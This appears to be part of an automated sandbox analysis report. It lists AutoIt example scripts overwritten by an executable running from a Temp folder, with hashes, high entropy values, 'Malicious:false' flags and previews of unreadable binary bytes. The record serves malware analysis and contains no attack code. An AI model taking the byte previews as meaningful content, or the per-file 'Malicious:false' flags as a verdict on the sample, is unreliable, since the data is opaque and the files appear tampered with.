                                                                                                                                                                                                                                                Preview:...ND...P...Pg...:.?^....ig=...l..EC.a.w)>S....x....9(..)a.'.Mp.s..Z...........Z..D.V'9.~...'ir...Z=?F..E.5a....%...HJ+.c...C.f.4..$/..P......:..j....0...6..EU..N?.NQ...n.h.@.wd..@.^.^.Q.G[......tl....yb.....r.!JK.nE..,.g.kd=..n.....]6....e0!...7...\].T....e....`......I=?&.z...s...u0fR..L....Op.].A[.7k..9.pei...$vBU...8..t..>^JEq.W.X'....%...%=q..-.>....{....h...NSN.>.E.M.B...;...)9[....3$.....%.n..q.l......3...In'`.....Ih.w.2Y..[.j,.B...[...<"H$.,.s.Y.(j.]Ef|X..}Y...vu....]N.3..G.[.|..2.a.en..$[..ay..a4.......D.{....A.>n.....J.~s...8K=NT6....0...Y.SH.K.....]..D..W..9T....{J..$M*....C...:`... ~.IU4.jr...A...A.\eg...w}.H..........0 GZ..V.F.j.A.7..,Fs.X.o.ksm..n`...J~...q.k=E........{4P....j.....b3/..m,.......o...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y......

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_EncodeSystemTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1382
                                                                                                                                                                                                                                                Entropy (8bit):7.842632239485972
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:fj1zys2LHSDDCxcOFPzdgM9u9gone52qYjmJrc0YXUZtwsTY9:VqLH9xrz6Mr552P4o0jZtwR
                                                                                                                                                                                                                                                MD5:1FFE710D0935E8B26C01E93BD264B321
                                                                                                                                                                                                                                                SHA1:991E1CD8647291D482E3D3CBEC6F046BE9EBCF59
                                                                                                                                                                                                                                                SHA-256:B301F19542846474EA9779AA510CB6490622DCDEDFA5121103DA70F0DF2F13F7
                                                                                                                                                                                                                                                SHA-512:50F7754245C3BC8C5E5F5A3330B3CE335BC8A5BC58C8D83A78F5BF202DCE7255C4A661CA5AF775DFD555F172386503123F95B12F38857510D92FF612FF123DC4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...bZ]`..;..j....;AN.t.6...=..19........md...5.n...AF=q./...b....u..b.QE4.A/`:.B..9h]..,.r.a{Z..........wgK|]..,(+.^.."..d.j8fo..-`..9.K.c.|.4iS....K...C.._qHD.[.^Q3l..(.:.X3%..UKQ.R.".Wr.../..&...kEEaCC...m.W.#.P.A.....k >..@rM-Y.o.`....M.G..>.H..K3s..0..w.P.[%.$.V.McUjGK.)..J..`j;u.Z..8.B`.~HD.a.........}8WA*@...r..`.~j1....;.v.-.^..0.C...da.T.z..`...]|.?. ....U............c/........,q............r.&...._..j.}d$...Ow....w.....%..T.;*)wJ.4U...5...yb....1...^.Y@..y....C.k(B+.^oH..M9.p...e.ZX.<\>k.89.Q2....{*HF...|.2......7.J...\<.54}Fe]..J...=..-h.........I..e#.8o....l)...3l.....{.v..3.8...h....lfa..(.S.k-..2.(!.....v\%j...s6...XC..\6.w.....D&..\;pl...."I..xJ.N..4/..8.].^..h.g.]EP+s....e......n....s..,....M!.:.&.-.....q...Gw.M{.,.gyA..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_FileTimeToArray.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1521
                                                                                                                                                                                                                                                Entropy (8bit):7.859606968832486
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:cIi1N5ACtwatsilpapc4s46v+h6YzjBLPfhvhiBYaI2f4G6jmJrc0YXUZtwsTI5Y:cIi1NaklLPMkbWXHBL3vjIfe4o0jZtwo
                                                                                                                                                                                                                                                MD5:81F174D5D26AECB09A0163604FFEF04A
                                                                                                                                                                                                                                                SHA1:181F02457B9C81506F48D3A153E027F1F7DF2E63
                                                                                                                                                                                                                                                SHA-256:E68F5A30564FFEC03EB7A243B3F41908320AE84841B7B006B9D61E7F94D1A5ED
                                                                                                                                                                                                                                                SHA-512:4466D1872F0EC39BB95D07D1472932889F782466FB37C19051579B83904918F7F837265DF8796B3603427650EC4A66CC8697C230CFB87FB9C5F84C4FC44E566A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..9...r..\;.L..e..s..wO.-.%u}.F.._....;&x%k.[..w.|......l..`H.......,..*7L...d.[.%..#..b....b}....yB.....@.b.9.J.+(8....f.w_{.Js".]...m....P?.....Cph.+a.<JM..,d..a.K[9Rn..rbx.d..l.....S..~t=.......K.H.Y2..j....R46..s1 .a.b^*=.>.v]..@.8...#I.U...4}m:..>kZ....R`c....$.Dx.)........U..Q..t"!.x.......Q..<..r.....)..: F.`...p.8..Jq>.....)L..0.IR..i.h.@..........-...V.k.;/.p.".f.G..E.q0.a..|........`.3...!....j.$......;.#<.......$.+.....y.,.a|9.N.`x"U.b.u.q..[.lm..#C..*.L...I..U.w..N......yT%...3.\.RX.3...>...Vd.Q........7i.t.\R..n...N.....T.WB..tA1=.{D,...U.9P..F...'.l.h.8.&..D4....i=.U@.,u..B....Q}#...d.(.b>....N&P>Z.\hLe'.[..g....b......fK.T.x.Mp<|Wv..o,..s..2.....&.'.:...n..+.[5.~|.........T....d...:..Ny...y...Jo.{..zg....")..Os.7dG1...k..]..P.U[.e...s..uF...p..+..G#.h.<.u..O.@@E...!..V...o.E...........-.B7r.z.fV.......m.KG.M$.....v.$..K@w.5...(..Q.$<...+x...kR.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_FileTimeToDOSDateTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1446
                                                                                                                                                                                                                                                Entropy (8bit):7.845607051464909
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:HdPk1n6ySQ9zu6JLLzj5z/3SjmJrc0YXUZtwsTzz01:Henpy69F/s4o0jZtwyz01
                                                                                                                                                                                                                                                MD5:7EA80C311DCBAC8B31949E1E3CBB1289
                                                                                                                                                                                                                                                SHA1:A6E124BD96E5D27D64126B39894C98ADF7B87E1A
                                                                                                                                                                                                                                                SHA-256:6B66C5EAF3BCF9ED05F2FD220AB996C47A63D59FCA1766B3E543C612547F9D05
                                                                                                                                                                                                                                                SHA-512:53FFA51F66F7B4EB16B7F69AB7DBEE2ED7B52E63F434BE6DAF2DE907FA513B2B1230469AFD5E1246C035E7C737C4E22E822090DFAE36794C0EC498E56FAC3690
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:^6.Y;..<..+..c...s.\=......N.lb......G...ToJp..X{....K...].j.!U\..'U.L.r......;.......4..d<}......q..R.O.*fw}.........b.....ZmQ..W7...tD....g...n..$;n.q.pYIs)...p...OV....q.U..U..L.P...c...w.a..%.........}...K.)`.5.].NP....D.{z.}R..........R..]........:.aO.+.z(.<]J.PK....g{..'.8..'..xe.$...[.O.....c.1r.GN# .........F..q.O.:.............UY....N.T...Q.+.........k....d....0...O.xf......T.2'S...'....'.Hm........U.Y..x.P....... .)..o...bwJS..).j.....U.kqG3..=Z...A..F.n0.x.T....I..S.7..3...y....mP..;)... ...u+....jO.N._<.w.M,....?\....(....R...3.%.l..t.!j..#.0.j.1......5..\...8.......S..y>.<7.........:"..Y.T:......L...X=&Z....8..I.<.-..+.'o'. Wnu.B..h.wx9.S.{.&[..g.)9v..|.....J(.1.'...U*4..C..%js .J..t.1;.h.4..b..a.y.8.sc>m".n.....$..-..'R...)....5R.~.bZp...=1...E../....#..<:...T.Y..7...2.".>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_FileTimeToLocalFileTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1488
                                                                                                                                                                                                                                                Entropy (8bit):7.870469106927596
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Dgu5fFP16PKNVmSv+85erqeL+Xyi7YjmJrc0YXUZtwsTj5:Dgu5fraKzxerKXyqm4o0jZtwa
                                                                                                                                                                                                                                                MD5:A79403D2A2B7191828F102B963867EE6
                                                                                                                                                                                                                                                SHA1:387537102B0AD7250D17A5B85C31FF2269B2503E
                                                                                                                                                                                                                                                SHA-256:1F50751CEC45D128FAEABB2CD0478804A2C124425177FD648C488F8B80A5DDB3
                                                                                                                                                                                                                                                SHA-512:D88A9CADDF61431785911B0B38535C0DF0D70A4842CD5F204BE71524F2E1F9EF7202D79AB10072E7ED8651BC0E8656A03420E48CE1E9467B23594247D8FB9578
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....?x=........e.}._I}l.W......QY.vw.r.=.bV..\.....7..L.].!...)W}i.jeP].%..~..L...X#.$[.i....A.9R..$.../..z..M.j.;7..._.W.u#..lN....L.xd...CC...zy.4V.g.DX..Cc....K...V...<`.y....@.z.d..8"..|S..r..g..g...~..>.0.8/..Y..;.oQg ..a.._.!...|q.R...D{k<.f............{m:..!..?L.M.......5.P._8..vbF2.P..2*.8..........U.l..09~`....../.1.Sy.k..d....m.._..m...v.Rx;\.f"P;.*1Di)_......J...WJ.'..L....MA. ..Zc...`...[......n.....W..;.qD{...7.sr......W.....N..0......{!1*O...Li..$.....?..........&....j..D....l.@7.'.p.n..2.G....<_J.[..H.bg.d...;..,...X..T..!...(.0.Z...G .3z\>y.!..I.*..;.t..mPdp...zD.+.z......O.zm..R...y....0i.:.....k......W......G..............eq3.;$.>ylw."`.&.f.k.Y..N.YL.eJ..5...d...@.Y...c.nf1..ay......R.@F&."Q.......H.8...[...7../..w..u&.~...F.S.....&qxj.|.4@..l..4.......~.%GO=.O.j9........Y..&..%.[..Q.xe.Iv...S...?L...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_FileTimeToSystemTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1488
                                                                                                                                                                                                                                                Entropy (8bit):7.881635417061624
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:f33n8p2dNMU/CglGADrskEaaIW9KkT9feVI1yjmJrc0YXUZtwsT8A9zk:vQ2dNMUuADr2Bgo9584o0jZtwt5
                                                                                                                                                                                                                                                MD5:7CFAB48FF4C352D7F894B9B18493AD4E
                                                                                                                                                                                                                                                SHA1:6FEE510945CEEC765AD9FB3800298484A7B11FC0
                                                                                                                                                                                                                                                SHA-256:3792A16974181D43136E01CEAB42D24CA9F54FD0E4F57A90427D013924D9B4F7
                                                                                                                                                                                                                                                SHA-512:EBDCACA89A938E2922A3B1E5647DEE02727F69DFC86163FC5CA691475DCC1B5F88C78C87EB0858280EA9DAD1DD88E892CB425723B2A71939ABE23402FAD929F7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:H.......P.m.|I..(.G.........9.0YNA..-...yn..4....^.....t.5..:.i".....Wy.dfs.0&.R71.z.Q.L.-.f<..|..........?....9..kA.....Ds.FF.bzDSU:.. .....7..t...>*.P....c~.wQ..G0X...!......5!Q.8E......H).o.g.{.rf.&!....W...-~..n.....^.i...ez.#tz.$..oZ.zNC|.l......)1X....q\*B.v.L.n.g...3.$..c=.y..%.....0b..ZT..$&..V.i....v-...u`.i[yn........P.~.9....Y.....skt'./%.....g#eK....p...R0..a..d#.....a8)....6Gt.,<.qG..........s.......`...Vh..O...._.=E......yl.%..w."S.....o.Y......... .#....s.w....j.8}...Q......'..O....2L.o'....d...*V.u.....T..=U.I>...:t}.....:A.[.g.....Ki>Tkk...c5..].j.W.FA..?..).i......"a$.i.....I..@.IW......S..p.......|.C..+iM%f}....s.2....d]=...+q...G....c.....x.(........l.)....D...7..}VO.]{.#.D.K.q...WvV.8....IE.w/..R..K..........._.s9...l.8D:?...y..;.L..4..xcR,%t...S..1#..<g.Q.bU.....1.....oM....u....a.qG.RO...P.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_GetLocalTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2119
                                                                                                                                                                                                                                                Entropy (8bit):7.894089227691938
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:p8vOfV7JHk5SkY8FLZOExzjcg/cxI4o0jZtwWE:uWVJHMtpOExzLEnleWE
                                                                                                                                                                                                                                                MD5:644C22301F0DCE4B70824A0417C1CED2
                                                                                                                                                                                                                                                SHA1:9FAB2705E155F34EB79381A97244F65C9B2DCA0C
                                                                                                                                                                                                                                                SHA-256:A7EA7B3DBFDCA3FDD2203A05529BF882398F4B2121E921DA128B877FA2CD751B
                                                                                                                                                                                                                                                SHA-512:4B2B25BBE06742C8B2E2ECD345DBF60E422FB635DC1E5CAC4822614B35EA2A55D87B92C786AB0C9B329B7D20EA5A552ABD3317D23DAB420F5BF0DBBC2192CFAE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......$.P9e._l...h.r..0.(e...9.f..a.8.MX..2.#.-FS.J.S....N.u...G.v....Bl...(.x4......|...:....bZw.H.H...%.=LC:.....R..k...s..2..8...*.....#aDK.RC..."<.|.0..*?v....b....f{\J.....'":.....Qz..B..M.f....<&I.,S....>...Y..d-..1.o.-..{ K...pM.7.Wf#J._.8...,[.....`.90..g.A..........Ma....6jUkC.t?e....7...A.z....... U......^...n. x......#f`O.....tJ.n........B...y.........-x^5.... K....t.N...pA,..e..o.4.m....*d..5.n.^Nl.4..{.<.........h.....l..>.Ln..W..f.......s......C.dt.._..=4{......<.cr..V..H....AQC...h..5.8..S..6|..*.9..Q0....F..`.%....[.-..#.S..../.@.. R.r.......E...Z#n..t.2.YO+r...T.v......."N}+.t...S.q....3....}..a...>.........h.$.wD$:...'-Z...Fnh...%p.F;..A..M..N@...?.{....E./.....[...@...C.s..&.L.#".&..b\~.}...\x".!.U..9......L..~..#.Nz...$..m.i.Fb..R|..Ta.b.i...c..eRT.]........Z....ZaU.]2.....~:....k.fJ......4....y.t.....<..H5vk|?.9k{....u..o.F.....r._...F[..W..M..k..Y.E.f.L.`d.I..hmci%4.$.e.).e....J.mO.Pl.....]E.9...<;pC..A...R...T.r@..q.s

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_GetSystemTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2155
                                                                                                                                                                                                                                                Entropy (8bit):7.905699914337315
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:K/M5I2z9rSok3V47g0GtOnb8X+iI+S6cKU7o4o0jZtwa:K05I2xW7VKgftourMb5lea
                                                                                                                                                                                                                                                MD5:529092793BF02900E880856FC9DED09C
                                                                                                                                                                                                                                                SHA1:16458E5FF7F274360FFB89D2040DF540AD484A48
                                                                                                                                                                                                                                                SHA-256:CDE252EC7EF4EE7241F5B4B92A01B16CC31D9A24E345C66C992A6AFAEE9822BC
                                                                                                                                                                                                                                                SHA-512:0FF44938BE89CD0D6C251ADDA3D5E81707E50FC02228014E5574B40270C111EB978C2675935CE62E441C42BF27E4A84E7C7820BDD8A62AD3B74EB93E712C6029
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:A...R....^Z..".?..u... ..!W..L..CZ...2^F......&Nq6.s...........1Y..xs]|6.=.h.........}.....lpHM....(4.`.P\W..P.?".N>..[....pg6.j.H.0.V.w./.|#...U..?/:'=..F..p.../...D...W.%m....9..^.>.....0.f.....W......d..S......r.........E..1.*..IF....~.M....O..-.ACm.q..bZ.=5..{.#L..}} &91L.8...X`..}..$.BHy.m..3|O....O.nI.?cp...v.....2........7...|.S..&....k...m1x_..;..yvXh.O.z...[..Kn^.'..a.Tzv.`..\.g...8R.U......_.o..{,.x........^e(.Qb..q..P......aSf..m.I(..J....oW.@.~.U_..4. ..BR.........}..6.>;._Z;..8H..T'..$.Ig.i.7....q@-..#.X...Lk)...v.L..Y..$./%..`....T...E^!...B......F.y.....K..Q.3...0f..6.>.C...v.t......Y.S.c.8.2.P.,....]..p.:.4.....T..u...:(.."H.....,E.`.P.,.....^;l....,E.i~..Q.....'../...).......\N.u.r...t.:fV.`.T.........$.._Q@...?V.A..E.VHVL'.{@................h?^O?..)...q..D...V..l+.~..O.c.x(.e.Q..09.U...[&...i..2......<.....= n.'.*yO@P....}..`..`MQ....z..i.U..!.o....I..T.......X.......3\....\(:Xp..f..H"..vU#^....I.~........H+....Q..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_GetSystemTimeAdjustment.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1988
                                                                                                                                                                                                                                                Entropy (8bit):7.894595780760854
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:bLpNR83w3HLkVXgNHD8o+2sc4o0jZtwIje:HK3ELNHD8RNle6e
                                                                                                                                                                                                                                                MD5:AF3A0305910DC4647AAFC72556CAC64E
                                                                                                                                                                                                                                                SHA1:18DF10FA7750367804DFEAD989D3EB11E755492E
                                                                                                                                                                                                                                                SHA-256:862324743C272B7967988A1044EC53B7103550FA43E213B41C7AA17A3858284C
                                                                                                                                                                                                                                                SHA-512:84C12AAB37FF29D9E7412AAB29258651B944D147FB68BD4ADC63B91258FBC40D057837162632BD0D9DE40C0139A361F58BA189BB9F0CCBABEA6C25662644D7B9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.O...d...+..7.b.*.H......~^..i..b...z.....R.$.'.....d....G.......-cM.c.v...:`w.y.......2W\.?.7....E...y.9.#UR..........>.......@.l.....F...n.\~t.z.....W...%...;..3u.|.......1...t......h.%...E%q......;t...*.......t..("zp....i..-...y..c..\..O...Y....O.^.aH(.6.........o.r.... .r$.E3.E. .2ks8j:!.C.h..tq..Z.@.x...jI...|.2].......R. upH...E....b.?.F.'y..i..C.T..:u. ..WCns...].)...KM.SW.0.}_h..._..:j.8.O..m.-qu.c?..g.t.q.3.....d......y'{.....%G.....o&.L...........UR..d.......V).K."..<.......`.1.O.m^[..3u(...e...B.x.d...d..G...}..n..f.....5.s5.FL..MaI.Vr..;..c..Vu.g.\.B.Z....agP...Xv.x?.......(M...N..z...?.dr....O..f.0...L..Dr....p.N.2`.....P~.j9H.%...Q.^Y...7..r...,.......Z.1...GZ/.7.b.7.1...8`.bnW...T..I_.65.|A...a..l.T.&..{..._...."..k.7.x5Sx$~|... ...JUH..W...4.S.p`./.......{.N....).CC.v.O....#..?.....J..:..(.M.B....z.T..%.48..D...!.G.,.W?.v'.[..x*7.g....{.^K.uA..8.7.R..7yk.vvq...{Ul.v.Z.....st.".VSQn.xJ.]...}H\Sr..vk.^.&_..I...........1

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_GetSystemTimeAsFileTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1327
                                                                                                                                                                                                                                                Entropy (8bit):7.845243670576428
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:J+yq/DFlHF32sYQgij8zBvvlI4r0Vb77jmJrc0YXUZtwsT5B:JvCDH52QgrBvvl3yf/4o0jZtwIB
                                                                                                                                                                                                                                                MD5:691086C2ED88EC995FC6812D6DE012FD
                                                                                                                                                                                                                                                SHA1:F41F88D3DBA1BFDBF6FDEADDB9235E336D8B72C5
                                                                                                                                                                                                                                                SHA-256:CFC49A9010B041ACEBD11BD6F86119B17445301C26769FD6203151E7D93E4B2F
                                                                                                                                                                                                                                                SHA-512:F712A3BD3B79118057B843807EBF8CAB3099990D0584F787D7E94BADC630DF32DAE174A9464979A50A7AC36B1AC0C3CF5B4FFB566D35387C111789E1E2B1BB75
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..!.E...........%x;k.O.t6...."..[.SH.b.)\{./......F.@.i^....C!tl....(...Hc.8.:......,.].[.1$...6......>....F.T...z...*x#V.t.~.......{..P.-,..3...J~Y+po}..L....E.P..>..px\.{..f.>#S^;;..Z3.CPT..h..F..wF*...e.........d.F...e&S..&.mBNki..+..e^2Y.z^.x;..Vi.]...h8.L.f~.....W...d..h@....jif..f!....-.1W]...e.6..b.LN....x..oR..lV.....C...>.].E..O.B.N....-g.[..l.L.`.......[y....@....R_..A.Nd...L><MQ}.),...-5l.PZ...JH,|..%p. ..%.....0.Y...L'...2".F..;.......S..a.E.`.......K.c..B.K....2....).. g=..BI..o...8..#../....z.z?k.....{...RJ....0e.X]0...v@..........n..cX.J.6..V.d.w..<%i...p_)...J._..;.x..B.4.M.[.M.=.j.2}..)p...m\.......{e...........j\.k.....H.....@>...~..z.ty...<fu....v.Z.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n..........

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_GetSystemTimes.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1460
                                                                                                                                                                                                                                                Entropy (8bit):7.861321870996444
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:gE/JRuQGjLKnkYo1sG90cC393UubJfI/2jmJrc0YXUZtwsTn:r/CQGjWnkrsG90cC9UM4o0jZtw8
                                                                                                                                                                                                                                                MD5:81A602DF18EEDE80577ED68A5C5F7E26
                                                                                                                                                                                                                                                SHA1:970CE7DF3A86331B4F70A25F6CA49FB0D54AE355
                                                                                                                                                                                                                                                SHA-256:6C875AC94DBCA569FE406B9D414DD789C47E48D9314E218BDACD5FFA5D74C04E
                                                                                                                                                                                                                                                SHA-512:F7F7FD1589EEC0E2611E7DE97454C40A0C68562D2A46FD8FB1955AFF357F2A93275BB827C49D531519B4AC116CF773A9FECA488A376A8BEC9F3A37BE905CF4A2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..>..W.........@]p.z.A.........9x......t.de."f$=..S..E.-BZ.mY9...<W8.q..v.y.(...f......2...u..mIn...h.>q..&:_g...9.."...........WV......~.D..>..5.)...........5....?.Z.35..!i.zA..*.....`=#.&.l...q=^..>> .s..b..K9...f,9^...lP[>e.W..V.....4..c@..X....|.>M&kT..E..+..[...!...0.\.dW7.......`Q.....D/..=A.pl=......6.\....M.R.H.[....XL.~}..s.W.d.........B8 {.*O..`..U3.[2..>..M.T[...e.....U_...)...Z.z.t%.......&....Y,a.87...1...g....#w...p.:X...<..ww.m...!.`Z!..D.z...F....>.0.Q'..-q....`...S*.UA;E.P...U.hkZ...Z..SJ.......r.15Wg..~.A...r.k.'4.0...J&.5.l..U..rd.g....\..w...`]....$.d.flP......8A3...n........s^~6.P..Lb*..>0..5..Z.r..}.....?......#....."M.K.W.0.W..6D.MI..S.[.^J#...C..g.Fs..0.Q.."..S.J..~i.!.,..z..e{g..,7..............,WM.4/].:x.....).k*.....KF.p..T..'.-.9.C.G.......gq.[...mr..aEQ..J-..E.:.E....g..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_GetTickCount.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1251
                                                                                                                                                                                                                                                Entropy (8bit):7.816310066440808
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:hDPr5NsySnZrGPZ/xzmcCCRH2jmJrc0YXUZtwsT2J9y:h35QZ8/xzmc3RHI4o0jZtwl9y
                                                                                                                                                                                                                                                MD5:ADCCBEE5F1085865B00145C24539EB81
                                                                                                                                                                                                                                                SHA1:67C1FB475D67701052C9F8E4A245E5A9E5A0B931
                                                                                                                                                                                                                                                SHA-256:06154743CBA1A1EA0458BBAD9CDC655926A9B5C75F1AA48D4D04FDD280AAC7B4
                                                                                                                                                                                                                                                SHA-512:9CA9F38DCAD1FD37D25ED5518C06C4499AC05CA94DCD87CE0B2A3F014F1F8406B722DEAB99AB17852A2CA71833B71C97EE97EBCE5142B2D3D00432C57D9F02EB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
